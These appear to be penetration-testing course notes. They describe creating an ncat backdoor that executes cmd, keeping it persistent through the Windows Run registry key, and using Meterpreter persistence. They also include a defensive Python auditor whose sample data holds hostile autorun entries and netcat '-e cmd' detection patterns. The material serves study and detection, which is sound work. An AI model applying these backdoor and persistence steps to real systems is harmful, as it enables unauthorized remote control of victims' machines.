⚙️System Attacks
Notes on system attacks from the ePTS course and other resources.
Classification:
🚪Backdoor
Ncat
Install it on the victim machine and run it with these commands:
`-l`: listen. `-e`: execute a file; we choose cmd so we can execute commands.
attacker will
It can also be run as a reverse listener, especially when the target is on another network:
On the attacker machine, listen:
`-v`: verbose, so we get output.
On the target machine:
Persistent Backdoor:
In the Windows Registry Editor, under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`, we add a string value for our ncat (or whatever we named it on the target machine) and set the command to run:
Then restart the victim machine.
As soon as they log in, the attacker who is listening will get a shell.
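From the defender's side, the same Run key is the place to look for this kind of persistence. The following is an added example, not part of the original notes: it parses `reg query`-style output and flags values that name a netcat-family binary or pass a shell to an exec option. The sample registry data, value names and function names are constructed for illustration.

```python
import re

# Constructed sample of `reg query` output for the Run key (not from a real host).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
    winupdate    REG_SZ    C:\Windows\System32\winconfig.exe 203.0.113.10 5555 -e cmd.exe
    helper    REG_SZ    C:\Users\Public\ncat.exe -l 5555 -e cmd
"""

# reg query separates value name, type and data with four spaces.
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# Netcat-family binary names. The notes point out the file may be renamed,
# so the argument check below matters more than this one.
NAME_RE = re.compile(r"(?i)(?:^|[\\/\"\s])(?:ncat|nc|nc64|netcat)(?:\.exe)?(?=[\"\s]|$)")
# "-e <shell>" style options: a command interpreter handed to a network tool.
EXEC_RE = re.compile(
    r"(?i)(?:^|\s)(?:-e|--exec|--sh-exec)\s+\"?(?:\S*[\\/])?(?:cmd|powershell|pwsh)(?:\.exe)?\b"
)

def parse_run_values(text):
    """Yield (key, value_name, data) for each value line under a key header."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and (m := VALUE_RE.match(line)):
            yield key, m["name"], m["data"]

def audit(text):
    """Return [(value_name, data, reasons)] for autorun entries worth reviewing."""
    findings = []
    for _key, name, data in parse_run_values(text):
        reasons = []
        if NAME_RE.search(data):
            reasons.append("netcat-family binary name")
        if EXEC_RE.search(data):
            reasons.append("shell passed to an exec option")
        if reasons:
            findings.append((name, data, reasons))
    return findings

if __name__ == "__main__":
    for name, data, reasons in audit(SAMPLE):
        print(f"[!] {name}: {data}  ({'; '.join(reasons)})")
```

The renamed binary (`winupdate`) is caught only by the argument check, which is why matching on file name alone is not enough.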
Metasploit
Using Meterpreter (which is just like ncat above but on steroids).
Meterpreter:
is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Get persistence in target machine:
After hacking one machine you will already have a session, which you can browse with the `sessions` command:
Start the listener:
🔐Password Attacks
Shell:
A program that executes commands. Check this to see various languages and ways to execute system commands (getting a shell):
open source webshells (read them before uploading them to a web server):